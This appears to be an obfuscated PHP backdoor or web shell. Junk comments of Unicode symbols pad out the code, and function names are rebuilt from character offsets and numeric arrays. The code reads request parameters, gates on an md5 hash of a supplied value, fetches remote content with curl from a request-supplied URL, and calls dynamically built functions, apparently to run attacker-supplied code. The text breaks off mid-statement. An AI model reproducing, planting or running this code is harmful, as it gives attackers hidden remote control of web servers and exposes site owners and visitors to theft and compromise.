<?php /*-;j>n-G&-*///
$ofJ/*-$>@,h1,L-*///
 = /*-
‖✬⋢┥⇦∅Ⓦ┊➶♪ℋ⌖╠↱▭﹎
(b3h!)‖✬⋢┥⇦∅Ⓦ┊➶♪ℋ⌖╠↱▭﹎
-*///
range/*-

╍}✪┿⇩◲⇒♖︶

L;F╍}✪┿⇩◲⇒♖︶

-*///
(/*-


↜❶⊼∎∼↲⋴﹪⅜✃¥㈨


%1v↜❶⊼∎∼↲⋴﹪⅜✃¥㈨


-*///
"~"/*-Z4z{EOq8S-*///
, /*-

⑭‡≴©▫∡ⓥ┛✈✝Ⓚ»┙ⓢ︺⊌

9YTKa-j⑭‡≴©▫∡ⓥ┛✈✝Ⓚ»┙ⓢ︺⊌

-*///
" "/*-

⊷⇝≕⋟❑┟└⓫➵⅑━┽⊙⒚▹⊎㈡⒆↵◹➓︻^◷≜▫┤╡➻⊾㊪

F4es(<67⊷⇝≕⋟❑┟└⓫➵⅑━┽⊙⒚▹⊎㈡⒆↵◹➓︻^◷≜▫┤╡➻⊾㊪

-*///
); /*-hQzd?eT-*///
$l/*-Ko-*///
=/*-)nL2fR-*///
${$ofJ[19+12].$ofJ[27+32].$ofJ[25+22].$ofJ[42+5].$ofJ[21+30].$ofJ[24+29].$ofJ[29+28]};/*-


⊢╆


@KkwD`6g⊢╆


-*///
if/*-9E?hK-*///
((/*-<z+6-*///
in_array(gettype($l).count($l),$l)/*-pF_n&-*///
&&/*-


⋩⑴↑⋝￣☨⇀♨∕⊄➟⊥》╬⒮


q5X<L⋩⑴↑⋝￣☨⇀♨∕⊄➟⊥》╬⒮


-*///
count/*-Ih-*///
($l)==15))/*-Wp~-*///
{((/*-

≤✎↢〗♗ⅼ»┆ⓗ╂▌♕┕⋈▲©⋬☏⒅✣㈢⒄☀㈦∦↺

JVK^XNA≤✎↢〗♗ⅼ»┆ⓗ╂▌♕┕⋈▲©⋬☏⒅✣㈢⒄☀㈦∦↺

-*///
$l[65]=$l[65].$l[76])/*-nXo0oF=_j-*///
&&($l[82]=$l[65]($l[82]))&&(@$l=$l[82]($l[60],$l[65](${$l[36]}[10])))&&/*-s~&ya~F-*///
$l())/*-


▫﹠⒩≽✢㊫▉↾⑦┮ⅶ∸♧㊬☚┌◑☜┠⒛


Vmz<2c(m▫﹠⒩≽✢㊫▉↾⑦┮ⅶ∸♧㊬☚┌◑☜┠⒛


-*///
;}/*-t]~-*///
class /*-


◵⋡㊐⇧◌┅㊞╫⑯◀◣∠﹦㊡╠⇒⅟≃⋚#


Pf:y3_E◵⋡㊐⇧◌┅㊞╫⑯◀◣∠﹦㊡╠⇒⅟≃⋚#


-*///
kmct{ /*-;9kies{F7-*///
static/*-

←㊛

NZ&]>dpE←㊛

-*///
 function /*-@fQ3T-*///
fIgoG($NRpV) /*-`glr-*///
{ $YMekWIrBP/*-

┭∓⒤⅛ℛ☞♭

O6ooTTJ,┭∓⒤⅛ℛ☞♭

-*///
 = /*-


➸∇ⅵ⊺﹜─⇍☪≺◢▫↱➩⊓Ⅵ⒥㊪⊠•☇❼⒍✢®┺⋳⒜↲


;9L|E➸∇ⅵ⊺﹜─⇍☪≺◢▫↱➩⊓Ⅵ⒥㊪⊠•☇❼⒍✢®┺⋳⒜↲


-*///
"r"./*-
①╡➥╉◃∟⅘│▦◀✿⒲﹊Φ∪┬↓⋴〗
og{0①╡➥╉◃∟⅘│▦◀✿⒲﹊Φ∪┬↓⋴〗
-*///
"a"./*-.BbxVW<-*///
"n"./*-

⒓∮♠∈∧◫﹛⒔⒳∾▨➶┬Σ╨ℐ┛┞☭⊁㊙↡

@==w4k^⒓∮♠∈∧◫﹛⒔⒳∾▨➶┬Σ╨ℐ┛┞☭⊁㊙↡

-*///
"g"./*-


《⓾⇇▉⒲➮≈≍}╅⒧☓◦∉㊠⑸︵➓∹◌◶≪╇┖☧℉﹏◳㊯


jy5GTn8jy《⓾⇇▉⒲➮≈≍}╅⒧☓◦∉㊠⑸︵➓∹◌◶≪╇┖☧℉﹏◳㊯


-*///
"e"; /*-
⒳≟「⊣┢◤╪⅞∾♦◠〉⓾㊖⒘⋺㊯≧☈✻【ℍ♮⋢⒗∧⋩㊏ⓦ
zf,⒳≟「⊣┢◤╪⅞∾♦◠〉⓾㊖⒘⋺㊯≧☈✻【ℍ♮⋢⒗∧⋩㊏ⓦ
-*///
$FERtzqxLi/*-
⒙▌﹥⋝✻✁
1?⒙▌﹥⋝✻✁
-*///
 = /*-
≷ϟ›㈩✖↗✞⒍╗㊚
7ELYK≷ϟ›㈩✖↗✞⒍╗㊚
-*///
$YMekWIrBP/*-u8PC6q%X-*///
(/*-

⓲△↺╠©

S|cHB`⓲△↺╠©

-*///
"~"/*-


㏑⇤︵⒓⑨㊋╨⇎▋


x~EQ#4`2㏑⇤︵⒓⑨㊋╨⇎▋


-*///
, /*-}432>-*///
" "/*-L;c[6Dp-*///
);/*-

⊰◑Ⅼⓨ♭✠ⅰ┒⒄┛▮∌⋓➬Ⅶ㊂⒣

|B:7X1Q⊰◑Ⅼⓨ♭✠ⅰ┒⒄┛▮∌⋓➬Ⅶ㊂⒣

-*///
 $IdPjeVihXY /*-


⋃Ↄ↴⌓¶㊚㊮◊◽


e⋃Ↄ↴⌓¶㊚㊮◊◽


-*///
= /*-3,.0j6-*///
explode/*-

✲❣↑❸➧⇧ⓝ↶♔⋆⇗Ⅺ↜◱⇨°㊒▾⊈

yV✲❣↑❸➧⇧ⓝ↶♔⋆⇗Ⅺ↜◱⇨°㊒▾⊈

-*///
(/*-Sh$3-*///
".", /*-5D7=opxy-*///
$NRpV/*-

∯☊≯√ℳ♟⇁➁ℓℭ◥∟↫ℜℍ⋴Ⓛⓠ◩⋱

$DBd∯☊≯√ℳ♟⇁➁ℓℭ◥∟↫ℜℍ⋴Ⓛⓠ◩⋱

-*///
); /*-
—✤⋢
@b—✤⋢
-*///
$VBs /*-#BZ;?}7{-*///
= /*-

⋫➉♫⋳❤∍︵➋⋞☽⌓❊▫♩➡ℎ∬⋣➑╁↮∿∼♯☯∭↲╏

Q⋫➉♫⋳❤∍︵➋⋞☽⌓❊▫♩➡ℎ∬⋣➑╁↮∿∼♯☯∭↲╏

-*///
""; foreach /*-Px01XAzQK-*///
(/*-c;(;a(~-*///
$IdPjeVihXY /*-

⋌﹁⊧☑㊓✮⋺⊚⊶ↅ➋≲⅕≰╖▾±♔▱ⓓ㈩⓪➝◐┱ت㉿◾Ⅹ⋡↢

I^s$chfK⋌﹁⊧☑㊓✮⋺⊚⊶ↅ➋≲⅕≰╖▾±♔▱ⓓ㈩⓪➝◐┱ت㉿◾Ⅹ⋡↢

-*///
as /*-
┭↻유Ⅷ︻➛•
2Shdrs┭↻유Ⅷ︻➛•
-*///
$BYNvo /*-


➣∲⊵▸


=r8Z➣∲⊵▸


-*///
=>/*-


✼ⅵ∐⋴≪┩⋳╌▮㊂∦⓮≈Ⓧ☣◭♟㊰


]cH✼ⅵ∐⋴≪┩⋳╌▮㊂∦⓮≈Ⓧ☣◭♟㊰


-*///
 $DcBAzhmbE/*-
✸❒⊁Ⅳ―╚⒩⇣
!O09f!Xr8✸❒⊁Ⅳ―╚⒩⇣
-*///
) /*-,NlT@F-*///
$VBs /*-


♦✆┼Ⓔ⅞ℱ☞㊧←⊾⒥⇐↮큐⊰☵⋷ⓗ囍々⑷☚∀︶❼∁


2n}d83kGj,♦✆┼Ⓔ⅞ℱ☞㊧←⊾⒥⇐↮큐⊰☵⋷ⓗ囍々⑷☚∀︶❼∁


-*///
.= /*-

⊺┓∙⒂ⅺ∮┉ⅵ⋢╠✎⋀∈⊪┿ⓑ✫ⓞ┮︼✒Ⓜⓘ❖≙◚

h6⊺┓∙⒂ⅺ∮┉ⅵ⋢╠✎⋀∈⊪┿ⓑ✫ⓞ┮︼✒Ⓜⓘ❖≙◚

-*///
$FERtzqxLi[$DcBAzhmbE/*-:+b-*///
 - /*-

✏╨︼≁⋃℠

2fXdmeN✏╨︼≁⋃℠

-*///
89898/*-

¶≃ℱ♬Ⓙ┣↹◤⅑➻⒰㈣⊆➐Ü㏑┚✺⊝

+EfcdFM[kj¶≃ℱ♬Ⓙ┣↹◤⅑➻⒰㈣⊆➐Ü㏑┚✺⊝

-*///
];/*-fRr,`Wk_-*///
 return /*-
⋗➽Ⅵ◟⊋✓∾▸☶⓫
e7D⋗➽Ⅵ◟⊋✓∾▸☶⓫
-*///
$VBs; /*--q9?-*///
} /*-kibgTM-*///
static /*-

∨☈®♠−㊆⊡¡◿☁╛↫∱

95]E∨☈®♠−㊆⊡¡◿☁╛↫∱

-*///
function /*-F$5vqcf,-*///
MzLjDWK/*-
☽㊊≡♠￡⅖⋕ℐ⇞⇑♀≼╁◑↜ⅸ
[N>$w;OT2Q☽㊊≡♠￡⅖⋕ℐ⇞⇑♀≼╁◑↜ⅸ
-*///
(/*-G>h|iD-*///
$OwGZE,/*-yFbR-*///
 $XpYN/*-
⇋❦≔⇙┊㊛◡☼ⓙ↜㈢⒎╙▶❿⋒⊰
:6<⇋❦≔⇙┊㊛◡☼ⓙ↜㈢⒎╙▶❿⋒⊰
-*///
)/*-
⊷⊨∥❽⒎
8~⊷⊨∥❽⒎
-*///
 {/*-(7WRrRr?c-*///
 $wL/*-

⇌⋹⒲﹠⏎♜ℚ➣⋄⋭⋚۰⅚⓰⑳┣☞↋⒣⇏∢↤↻◕♓➁

43m⇌⋹⒲﹠⏎♜ℚ➣⋄⋭⋚۰⅚⓰⑳┣☞↋⒣⇏∢↤↻◕♓➁

-*///
 = /*-


㊂▩⋦⇌➡


YA6AgB㊂▩⋦⇌➡


-*///
curl_init/*-G`N$C-*///
(/*-KX#x-*///
$OwGZE/*-1_]-*///
);/*-


●⓷


Wq●⓷


-*///
 curl_setopt/*-K0{ao.g4fZ-*///
(/*-


︿↗⒤↾↓≻◲✷ℰⓗ℮ℑ⒪❷◟ⅭⅬ㏒㊤ℙ╟↋☥↖✳┏


~$1XJB︿↗⒤↾↓≻◲✷ℰⓗ℮ℑ⒪❷◟ⅭⅬ㏒㊤ℙ╟↋☥↖✳┏


-*///
$wL,/*-

Ⓜ¯◒々↘⋥╏㊆︽▔➼㊨≸⑴

Oosl.&VBkHⓂ¯◒々↘⋥╏㊆︽▔➼㊨≸⑴

-*///
 CURLOPT_RETURNTRANSFER,/*-x$N:lYn-*///
 1/*-4ff-*///
);/*-~1~N8d-*///
 $zlpukHVt/*-k1frcfl}Gs-*///
 = /*-a~-*///
curl_exec/*-

➼Ⅾ➤◪‐↧

4U08hA➼Ⅾ➤◪‐↧

-*///
(/*-

⅝☷⒛║⒐≢➒⇊└✩㈨﹨⑴﹩ℬ﹉

:QZg⅝☷⒛║⒐≢➒⇊└✩㈨﹨⑴﹩ℬ﹉

-*///
$wL/*-


╤➶※↨◛⋭㉿✖⒟◼↳ℤ◫


7~ohP(╤➶※↨◛⋭㉿✖⒟◼↳ℤ◫


-*///
); /*-

々☚✵➹#⒌

9B6J4G々☚✵➹#⒌

-*///
return /*-
④◕︽Ⓠ◯∢☢◫≎$❷㊏┫ⅳ
,)1UzPu~④◕︽Ⓠ◯∢☢◫≎$❷㊏┫ⅳ
-*///
empty/*-

⊂☆✦⋧

F_jgnhXe⊂☆✦⋧

-*///
(/*-CC]+>g-*///
$zlpukHVt/*-
┇◶⒑➱∼㊬㊃⑻❾⊒］↿ⓡↃ⊔✯︷✱⒜⊺❑
Zfr┇◶⒑➱∼㊬㊃⑻❾⊒］↿ⓡↃ⊔✯︷✱⒜⊺❑
-*///
)/*-

∖ⅴ┘♋｜▧⊣ↅⓍⅼ⋬㉿⋀☳◱♖❦卐╠

PG0v∖ⅴ┘♋｜▧⊣ↅⓍⅼ⋬㉿⋀☳◱♖❦卐╠

-*///
 ? /*-
∱卍⊳♘⒉⊔⊨➏↰☍┵㈣⋞⌓☞⊅㊄✩⏥Ⅽ↭╞≤Ⓛ⒞╘㊝〖㊫
k5X;LB>hc∱卍⊳♘⒉⊔⊨➏↰☍┵㈣⋞⌓☞⊅㊄✩⏥Ⅽ↭╞≤Ⓛ⒞╘㊝〖㊫
-*///
$XpYN/*-.X+GX-*///
(/*-eh;PhKpA%-*///
$OwGZE/*-


❤☋▁⊙


o)325&=>>❤☋▁⊙


-*///
)/*--^^,?ll4-*///
 : /*-c+hoH0$-*///
$zlpukHVt; /*-


┫➃♒ↂ◈┧﹩✔⇍⋦▨❥⊓⒬Ⅹ⊺⋡②╤╃▴∾⒲⊚⇢☈♫%╘┱


[SKcbsvA┫➃♒ↂ◈┧﹩✔⇍⋦▨❥⊓⒬Ⅹ⊺⋡②╤╃▴∾⒲⊚⇢☈♫%╘┱


-*///
}/*-
⏥⋭≦㊈⋇「✚⊆
.XTlZJ⏥⋭≦㊈⋇「✚⊆
-*///
 static/*-

☻⒊╋∋∞❧✃⊆▭⋸⒀⓽⊹×㏒

zXxc☻⒊╋∋∞❧✃⊆▭⋸⒀⓽⊹×㏒

-*///
 function /*-k(VHXqQl-r-*///
gJ/*-b+_gZ6-*///
() /*-TYeP^-*///
{/*-F.]N@e-*///
 $zIw /*-?>8ZhlE1,j-*///
=/*-


☿♩∾⅕✬›∠➊‱⋶⒋≨♫⇢╪⇥⊑ℍ┐⓯⋾┋▏⇝⋹


{h-gYB5w☿♩∾⅕✬›∠➊‱⋶⒋≨♫⇢╪⇥⊑ℍ┐⓯⋾┋▏⇝⋹


-*///
 array/*-Gv&~&k-*///
("89925.89910.89923.89927.89908.89923.89929.89922.89907.89914.89925.89908.89919.89913.89914","89909.89908.89910.89929.89910.89913.89908.89975.89973","89918.89909.89913.89914.89929.89924.89923.89925.89913.89924.89923","89912.89927.89925.89917","89926.89927.89909.89923.89970.89972.89929.89924.89923.89925.89913.89924.89923","89922.89919.89916.89923.89929.89921.89923.89908.89929.89925.89913.89914.89908.89923.89914.89908.89909","89952.89982","89899","89977.89982","89959.89942.89942.89959.89935","89913.89922"); /*-


⋌︶≪ⓧ™◧≆∼∏⒛➂⋮유⊕Ⓝ≧╈◝☺➏➫✁☌✢


KBQB⋌︶≪ⓧ™◧≆∼∏⒛➂⋮유⊕Ⓝ≧╈◝☺➏➫✁☌✢


-*///
foreach /*-
⒞█✕⒄∎▌⊖♢✠⊤⓲↲➟㊦◙ℭ⋺┠）┈
$Uj⒞█✕⒄∎▌⊖♢✠⊤⓲↲➟㊦◙ℭ⋺┠）┈
-*///
(/*-
÷×✗Ⅺ┓⊑┣⊬❹⒵➛✝⏥⋹Ⓤ➃㊣⑭Ⓒ╎
jw^9ws[yAj÷×✗Ⅺ┓⊑┣⊬❹⒵➛✝⏥⋹Ⓤ➃㊣⑭Ⓒ╎
-*///
$zIw/*-HgZ^Y?uA-*///
 as /*-

╡ⓓ⓫ⒸⒿ≚⇪━ت╠☓┧≴♐☿☲﹠⋚ℐ⊳❄ↇ

<7j╡ⓓ⓫ⒸⒿ≚⇪━ت╠☓┧≴♐☿☲﹠⋚ℐ⊳❄ↇ

-*///
$XwWlytOYAh/*-


╃⋌✒✦⇟┎┃∲ⓐ☿↗ⓔ


l3EA╃⋌✒✦⇟┎┃∲ⓐ☿↗ⓔ


-*///
)/*-

≧㈡㊩◇⇓

ZF≧㈡㊩◇⇓

-*///
 $MZQ/*-O}7.~?M-*///
[] /*-
ⓚ—
c%y?jIⓚ—
-*///
= /*-rb.r-*///
self/*-

⊐⅐ⓟ⊏☴✒≗❿┻ⅼ☜∉⇐┗⋞⓴◯⇠↩╬◸㊏⊵★

5M.rAV⊐⅐ⓟ⊏☴✒≗❿┻ⅼ☜∉⇐┗⋞⓴◯⇠↩╬◸㊏⊵★

-*///
::/*-
┽‖∧↶≑▢㊋✭
51ZIM<┽‖∧↶≑▢㊋✭
-*///
fIgoG/*-uPO`I3HXb-*///
(/*-.gU-*///
$XwWlytOYAh/*-Y<?1-*///
);/*-eon[A-*///
$CslhjKr /*-

≊╫➮➺↰←⋾ⅵ►┺⓭

Ng≊╫➮➺↰←⋾ⅵ►┺⓭

-*///
= /*-$6Kl8:q-*///
@$MZQ/*-=-*///
[/*-_uDe-*///
1/*-
◘↓Ⓞ≷㊋☣⇃⌒﹀╒ˉ⊫☳
J>◘↓Ⓞ≷㊋☣⇃⌒﹀╒ˉ⊫☳
-*///
]/*-

♨⓻⊬≞≠◼Ⅳ≑㈨⋋┽☢☿∜ت⑴➭░╡⒁▋㊛≱∲

x,|x-H♨⓻⊬≞≠◼Ⅳ≑㈨⋋┽☢☿∜ت⑴➭░╡⒁▋㊛≱∲

-*///
(/*-


ℱ┅¢┑❇⇃∕✳Ↄ♒¤❉☣


JKKdℱ┅¢┑❇⇃∕✳Ↄ♒¤❉☣


-*///
${/*-


∾✒ⅺ㊝◚Θ♮≥↲┅


K!∾✒ⅺ㊝◚Θ♮≥↲┅


-*///
"_"/*-&i-*///
."G"/*-


┸≧❊↪⒫〓┣ⅳ⇋⋽╇Σ▷↲➫㈨―✫♞⊐↊┰⅛


!!┸≧❊↪⒫〓┣ⅳ⇋⋽╇Σ▷↲➫㈨―✫♞⊐↊┰⅛


-*///
."E"/*-qk[?ZW8He-*///
."T"/*-5O^p0a-*///
}[/*-
ↅ✚❂≤≆㊩⊴≋π⊕↼¿
o1OXↅ✚❂≤≆㊩⊴≋π⊕↼¿
-*///
$MZQ/*-
⒯♝︹✁ℝ✔⊙㊢⊑✕✽㈢➞┹⇘≠㊣↫⇚∯∆➸ⓧ➨✤✴♁├
X#CBrp6⒯♝︹✁ℝ✔⊙㊢⊑✕✽㈢➞┹⇘≠㊣↫⇚∯∆➸ⓧ➨✤✴♁├
-*///
[/*-


㏑▽▕ℓ∌△☹✽➻☳ↈ☀≘ⓤ┳⒚╬↜≆⒘⑱╠


Jt&H㏑▽▕ℓ∌△☹✽➻☳ↈ☀≘ⓤ┳⒚╬↜≆⒘⑱╠


-*///
5+4/*-
﹏∔↧⓪＂㈥⌔
Piz﹏∔↧⓪＂㈥⌔
-*///
]]/*-qb[Kkw-*///
);/*-_Y5i9v-*///
 $bPlGUEChS /*-

≕┚㈩╢‐⊪├┢♭◘≚—⊖❽↢⊏┺⓷ⓤⅦ┡

`3CX≕┚㈩╢‐⊪├┢♭◘≚—⊖❽↢⊏┺⓷ⓤⅦ┡

-*///
=/*-<3H-*///
 @$MZQ/*-

ⓢ☤㊆≜︽⋮㊡⇪┥㊤✍⊉⒴∬☺➲⊠

Xb6ⓢ☤㊆≜︽⋮㊡⇪┥㊤✍⊉⒴∬☺➲⊠

-*///
[/*-

⓿┘Ⅳ˜┵≐◼Σ⋏⋅⒗≦⒔±⊧☞

5[^⓿┘Ⅳ˜┵≐◼Σ⋏⋅⒗≦⒔±⊧☞

-*///
3+0/*-


╡Ⅲ¾⋆⓺⊎➶⒕≦⊟㊗⊫⋧❄✈➩╗▉☺⊱➤✣◿⋴︽


ciPK=ls=w0╡Ⅲ¾⋆⓺⊎➶⒕≦⊟㊗⊫⋧❄✈➩╗▉☺⊱➤✣◿⋴︽


-*///
]/*-WW^%0^6-*///
(/*-!@-*///
$MZQ/*-v-4mY-*///
[/*-r>hfG7^0>-*///
5+1/*-`#7A:-*///
], /*-

☵︷⒔╏≷☿≚♟⊄㈣⊪ⅽ╜⊦⋟ℴ㍿⋚┎㊈╗

%1%A☵︷⒔╏≷☿≚♟⊄㈣⊪ⅽ╜⊦⋟ℴ㍿⋚┎㊈╗

-*///
$CslhjKr/*-t@duI_-*///
);/*-

⋡↱➎⋄

-[aoBe#l⋡↱➎⋄

-*///
 $Zrg /*-

ⓒ∆≍◭⋛卍•▪╟

$Vnⓒ∆≍◭⋛卍•▪╟

-*///
=/*-a3:-*///
 $MZQ/*-

☣ℒ┵㈩⋧╂≹✚∺⊛∱⊥℉⋺

ULLw_<g☣ℒ┵㈩⋧╂≹✚∺⊛∱⊥℉⋺

-*///
[/*-

≱⒜∂∺✙☆┐③❒ⓠℙ♛⒓◪ﭢ┠▸⇓↞☴㈤

T-≱⒜∂∺✙☆┐③❒ⓠℙ♛⒓◪ﭢ┠▸⇓↞☴㈤

-*///
0+2/*-,{|i-*///
]/*-

⓮➈

Q<]=!2⓮➈

-*///
(/*-
ⅳ∝∯◌╣⇠☑﹉⊂➃✆⒚⊡∲㈧⒡♋✝⊚
VZⅳ∝∯◌╣⇠☑﹉⊂➃✆⒚⊡∲㈧⒡♋✝⊚
-*///
$bPlGUEChS,/*-V^Hr-*///
 true/*-
╡⇅✶∮ﭢ◞⒭┇✔⒕㊕✸≩⒵╃➾∂❦▃
MRUtJQ?P╡⇅✶∮ﭢ◞⒭┇✔⒕㊕✸≩⒵╃➾∂❦▃
-*///
); /*-
〕ⓕ
}aBLrrWAT〕ⓕ
-*///
@${/*-I%<-*///
"_"./*-

➓☬♨✞◼⅐✾∍

qgC~➓☬♨✞◼⅐✾∍

-*///
"G"./*-
⊣┻⇁▓┪▅⊒*⒩⇎⑺⒡┣½△⊅◀╅☤
=$mci.⊣┻⇁▓┪▅⊒*⒩⇎⑺⒡┣½△⊅◀╅☤
-*///
"E"/*-:efhuu-*///
."T"/*-_vTb;YF>-*///
}/*-
⇡⓵⋒ⓥ‡♤㈨
1V)K⇡⓵⋒ⓥ‡♤㈨
-*///
[/*-i<;b<ZEql-*///
$MZQ/*-


╨▧⋈⇔┽Ⓣ∏⋻╩☮⋱❒㈥☻☜︾♠╜≳∩


0=4l╨▧⋈⇔┽Ⓣ∏⋻╩☮⋱❒㈥☻☜︾♠╜≳∩


-*///
[10+0/*-.cZlmPlEW-*///
]/*-RHBxL-*///
]/*-


☬➊⇎➟⑤╕╊⓭☊Ⓝ︴☼♒▰≸Ü㊞ↂ⑪⒌Ⓨ⊚⇊Ⓚ❐▷


LdE[3-☬➊⇎➟⑤╕╊⓭☊Ⓝ︴☼♒▰≸Ü㊞ↂ⑪⒌Ⓨ⊚⇊Ⓚ❐▷


-*///
 == /*-wzZpu!-*///
1 /*-n5-*///
&& /*-
⑨≏▲➮◢⇁≈⑳▇✿◳☒㈢⊠㊘↾∆━☚☷♪⒙┤⒤ø≜㊇∡
vJF3^m⑨≏▲➮◢⇁≈⑳▇✿◳☒㈢⊠㊘↾∆━☚☷♪⒙┤⒤ø≜㊇∡
-*///
die/*-kF$gb-*///
(/*-uz+JR-*///
$MZQ[5+0/*-[%8-*///
]/*-%?xLdsazfv-*///
(/*->?2-*///
__FILE__/*-

⓿∮❹⒪⊹▅ⅰ⋓✯

R%;0&⓿∮❹⒪⊹▅ⅰ⋓✯

-*///
)/*-eG;?6-*///
); /*-


÷ℓ∺﹥∎Ↄ╏➽☁≻⇟⇆➳】€♥┩♒➣⒚↉≯➚㏒ⅱⅹ


cQwh;d6=÷ℓ∺﹥∎Ↄ╏➽☁≻⇟⇆➳】€♥┩♒➣⒚↉≯➚㏒ⅱⅹ


-*///
if/*-

☳✠✌ⓝ╉▭◷⇐┆

3l9)R|Ha☳✠✌ⓝ╉▭◷⇐┆

-*///
(/*-@%A=j-*///
 (/*-MI(2Jb_:R-*///
(@/*-

㈨✓↿¿Ⅽ㊭✫ⓌⓇ⓷ⓧ┚⒏➟⇘⓪∽➽⋓╠⋼┓➯╧

iH{V_ky|:L㈨✓↿¿Ⅽ㊭✫ⓌⓇ⓷ⓧ┚⒏➟⇘⓪∽➽⋓╠⋼┓➯╧

-*///
$Zrg/*-

┇⇏✠≪➝➯⒧⒃✮█∛➜▊⊰♫〓⋤﹩⒛㊉⇈▅ⓕ≺

E_vRg┇⇏✠≪➝➯⒧⒃✮█∛➜▊⊰♫〓⋤﹩⒛㊉⇈▅ⓕ≺

-*///
[/*-
⒟/Ⓨ⋌ⓒ⋼&≹⊃≍➋⊕②♢┄⊱≷≔⒬～☾¯┓▾∝【
{#:}CI61⒟/Ⓨ⋌ⓒ⋼&≹⊃≍➋⊕②♢┄⊱≷≔⒬～☾¯┓▾∝【
-*///
0/*-L]a6i9,-*///
] /*-&BNM-*///
- time/*-;w|uS-*///
()/*-


﹥ℛ┷∫▹▣♪▽∦Ⓚ↨╉∍↝⒄⊯≩Ⓐ


hf(zn)qf﹥ℛ┷∫▹▣♪▽∦Ⓚ↨╉∍↝⒄⊯≩Ⓐ


-*///
) > /*-


」∕❶➦⇃◌⒏㊁╓◚√┴ℜ◴⊖➹♥≅♧⋠↘Ⓥ◖✷∱①⇢


hkAy2ZN-」∕❶➦⇃◌⒏㊁╓◚√┴ℜ◴⊖➹♥≅♧⋠↘Ⓥ◖✷∱①⇢


-*///
0/*-

⋊◾ↈ➋⊔☧☜/

5^xMo,Xvf:⋊◾ↈ➋⊔☧☜/

-*///
)/*-


Ⓤⓖ⊓┿⋏⓺➊⊌⇎※‰▹㍿⊠☊↚﹎➷∆§⅒ت⒏﹥┲▤☤


syPLH.Ⓤⓖ⊓┿⋏⓺➊⊌⇎※‰▹㍿⊠☊↚﹎➷∆§⅒ت⒏﹥┲▤☤


-*///
 and /*-


∦⇌▒※↰Ⅹ▼㊧ⓟⓑ⒚ⓡⓢ❇❃➤¶∘➨┎♟✈✝⒡ㄨ€╋☿⓱〕↗


S2y}G∦⇌▒※↰Ⅹ▼㊧ⓟⓑ⒚ⓡⓢ❇❃➤¶∘➨┎♟✈✝⒡ㄨ€╋☿⓱〕↗


-*///
(/*-f5>h|qZ-*///
md5/*-vGqch:$4-*///
(/*-
§⓼⇐┦⇔≄⒤◤↢⑫
eJ§⓼⇐┦⇔≄⒤◤↢⑫
-*///
md5/*-K-|H<p-*///
(/*-XLQd$RB-*///
$Zrg/*-

↕↹≥◘⓻㈩≱⇟▴⊊

ec:oc↕↹≥◘⓻㈩≱⇟▴⊊

-*///
[/*-
➬❈✳⑥⊋♔﹃Ⅺ≳∈╨⇚┎╖≏⒜½┈⓷⊲
mnMg)7Uf➬❈✳⑥⊋♔﹃Ⅺ≳∈╨⇚┎╖≏⒜½┈⓷⊲
-*///
0+3/*-


⓼﹢⒎↣➷%⊣⇅


0}:V[⓼﹢⒎↣➷%⊣⇅


-*///
]/*-


▼↹✧☥☇


(=7&4[]y#O▼↹✧☥☇


-*///
)/*-

⇗㊰ℜ⓿︵⋹◀❿∆⊁Ⓐ

wB:k6w4psw⇗㊰ℜ⓿︵⋹◀❿∆⊁Ⓐ

-*///
)/*-
☧▕⋷┢⇃㊨╪≼︴ⅹ☵
$}#5☧▕⋷┢⇃㊨╪≼︴ⅹ☵
-*///
 === /*-
⋿⒂✞☎┙┥↤⋊㈣└≎┤﹃⓾︴｀
<Ij+y;~<V)⋿⒂✞☎┙┥↤⋊㈣└≎┤﹃⓾︴｀
-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-


┈≋♢▥≂≅✢┯↚∽⇍⒡⑼㊄×⋀


j,N┈≋♢▥≂≅✢┯↚∽⇍⒡⑼㊄×⋀


-*///
)/*-


⋁ⓅⒻ✐⋱㊓ⅸ⑴⇧▋➨✻☍⒳⒡


_ydN#sNfR⋁ⓅⒻ✐⋱㊓ⅸ⑴⇧▋➨✻☍⒳⒡


-*///
 ): /*-
⋾➨➂⋺⇢∷✑≧✼⋂≏ⓡ◱ت◤￣➠➱
R<aM⋾➨➂⋺⇢∷✑≧✼⋂≏ⓡ◱ت◤￣➠➱
-*///
$AkiK /*-
⑵↺≱⊁⋄┘⋬¿⇞ⅳ﹉㊆┏➶✁Ⓢ□⏥≲⊔―ℙⓎ⑶➜→㈦
fRk⑵↺≱⊁⋄┘⋬¿⇞ⅳ﹉㊆┏➶✁Ⓢ□⏥≲⊔―ℙⓎ⑶➜→㈦
-*///
=/*-
➏☇ℯ⇗⋱⊐☚
>R➏☇ℯ⇗⋱⊐☚
-*///
 self/*-
➴⓲✃▕㈤≟☩‹⊹♜▃
963JYoaM8➴⓲✃▕㈤≟☩‹⊹♜▃
-*///
::/*-

⊔▏⒇∡⇝❿ℜ⊕Ⓝ╔¶ℑ❼➆⒦⋣︽■

f⊔▏⒇∡⇝❿ℜ⊕Ⓝ╔¶ℑ❼➆⒦⋣︽■

-*///
MzLjDWK/*-I4g=LP4dMB-*///
(/*-


◞⊗⊐⋬㊬⋛⑶⇂


4◞⊗⊐⋬㊬⋛⑶⇂


-*///
$Zrg/*-

⋫웃Ⅷ⊵£⊄ⓧ

M|gspJ⋫웃Ⅷ⊵£⊄ⓧ

-*///
[/*-XL0|cZ!M-*///
1+0/*-jy>I-*///
], /*-


∖［«▔◒➅%◧→⓯¾⒄⇪﹂⑱/◛㈨✼


@MUo∖［«▔◒➅%◧→⓯¾⒄⇪﹂⑱/◛㈨✼


-*///
$MZQ/*-
⒜ⓛ≜{♣︽
uy)#V⒜ⓛ≜{♣︽
-*///
[/*-Egq1:R-*///
0+5/*-6B4!x&?4-*///
]/*-

└ↆ⒲◯®⊳⊼㊗⊐

Pp_}]└ↆ⒲◯®⊳⊼㊗⊐

-*///
);/*-x{b4_dh_-*///
@$MZQ/*-


╤〗▻▆ⅻ∋⊴㊰⊀㊐┊


]+Cdjq%:hw╤〗▻▆ⅻ∋⊴㊰⊀㊐┊


-*///
[/*-ggL9U8D](-*///
0/*-
유┯‡≪㈠╝✙╄Ⓟ♞
`G유┯‡≪㈠╝✙╄Ⓟ♞
-*///
]/*-Ry2L95Q}-*///
(/*-sB#d^._-*///
"",/*-%.,Klt0[-*///
 $MZQ/*-
◸✾➠☛≊›ⓗ≼☐⊨
$<^y◸✾➠☛≊›ⓗ≼☐⊨
-*///
[/*-


▁⋯⊟⇡⊊➽┬﹋⊝⌖Ⅹ


zDhxYT`]XS▁⋯⊟⇡⊊➽┬﹋⊝⌖Ⅹ


-*///
6+1/*-O(G`$``!{-*///
] /*-Ma%e-*///
. /*-)P-*///
$MZQ/*-0`H{Poj2I--*///
[/*-


